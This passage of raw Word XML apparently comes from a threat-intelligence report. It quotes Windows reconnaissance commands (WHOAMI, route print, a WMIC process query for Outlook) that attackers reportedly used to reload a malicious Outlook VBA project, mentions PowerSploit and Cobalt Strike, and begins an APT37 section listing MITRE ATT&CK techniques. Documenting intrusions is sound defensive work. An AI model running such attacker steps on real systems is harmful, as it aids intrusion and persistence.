        <w:t>route print Displaying a list of persistent routes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9986F7" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WHOAMI Outputs the owner of the current login session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB880C" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>local</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, admin, system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FF17CB" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WMIC path win32_process get </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02407BA6" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Caption,Processid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,Commandline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED44BEB" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OUTLOOK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3171748E" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Searching for the process ID of OUTLOOK, in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689131A4" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">order to restart it, so it would load the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3D9A7" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vbaproject.otm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2985162D" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B47EAEB" w14:textId="77777777" w:rsidR="00650E57" w:rsidRPr="00650E57" w:rsidRDefault="00650E57" w:rsidP="00650E57">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00650E57">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Scanning using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00650E57">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="463D3510" w14:textId="77777777" w:rsidR="002F3863" w:rsidRDefault="00650E57" w:rsidP="00650E57">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once the Cobalt Strike Beacon was installed, the attackers attempted to find privilege escalation vulnerabilities that they could exploit on the compromised hosts. The following example shows a command that was run by a spawned PowerShell process: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AF8A0F" w14:textId="77777777" w:rsidR="002F3863" w:rsidRDefault="002F3863" w:rsidP="00650E57">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD9109E" w14:textId="77777777" w:rsidR="002F3863" w:rsidRDefault="002F3863" w:rsidP="002F3863">
      <w:r>
        <w:t>[3] Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C91E74" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="002F3863" w:rsidP="002F3863">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>TBC later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C84BF" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="002F3863">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2A38A8" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CC4EEA" w14:textId="6CFCBA32" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="005F312C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc153480866"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>APT37</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="63FC1E3A" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="005B4630" w:rsidRDefault="005F312C" w:rsidP="005F312C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc153480867"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="519C4260" w14:textId="77777777" w:rsidR="007234CB" w:rsidRPr="007234CB" w:rsidRDefault="007234CB" w:rsidP="007234CB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0067 - APT37 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AB3237" w14:textId="287BF96B" w:rsidR="007234CB" w:rsidRPr="007234CB" w:rsidRDefault="007234CB" w:rsidP="007234CB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group ATT&amp;CK attribution is </w:t>
      </w:r>
      <w:r w:rsidR="00300919" w:rsidRPr="00300919">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>North Korea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB263EA" w14:textId="77777777" w:rsidR="007234CB" w:rsidRPr="007234CB" w:rsidRDefault="007234CB" w:rsidP="007234CB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is KP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFCC44"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C38C0"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A59F4BE"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1566.001', 'T1189']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780EF270"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T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077B596" w14:textId="77777777" w:rsidR="007234CB" w:rsidRPr="00E34A89" w:rsidRDefault="007234CB" w:rsidP="007F6CC0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E34A89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E34A89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1189 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E34A89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Drive-by Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E21EB"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1059', 'T1059.006', 'T1053.005', 'T1059.005', 'T1106', 'T1203', 'T1204.002', 'T1559.002', 'T1059.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E819E5"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1059 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Scripting Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13366B1E"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T1059.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B81A5E"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D85208"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T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CFB422"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1106 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Native API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E2ACE"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1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FD125A"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2E43E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002E43E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B5E7A7"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T1559.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Inter-Process Communication&gt;:Dynamic Data Exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0584CD29" w14:textId="77777777" w:rsidR="007234CB" w:rsidRPr="00DD46F5" w:rsidRDefault="007234CB" w:rsidP="007F6CC0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD46F5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD46F5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BF490D"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1053.005', 'T1547.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F62698B"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D77A999" w14:textId="77777777" w:rsidR="007234CB" w:rsidRPr="00561BB2" w:rsidRDefault="007234CB" w:rsidP="007F6CC0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00561BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00561BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00561BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00561BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B243F4"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1053.005', 'T1548.002', 'T1055', 'T1547.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE5944D"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01770B58"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T1548.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Abuse Elevation Control Mechanism&gt;:Bypass User Account Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFAF05F"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1055 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE44D0D"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506CB048"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1027.003', 'T1548.002', 'T1027', 'T1055', 'T1036.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B39BB6"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T1027.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296981FD"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T1548.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Abuse Elevation Control Mechanism&gt;:Bypass User Account Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC9DE7"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r w:rsidRPr="00DA5851">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA5851">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA5851">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C327C56"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r w:rsidRPr="00AD59F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD59F3">
        <w:rPr>
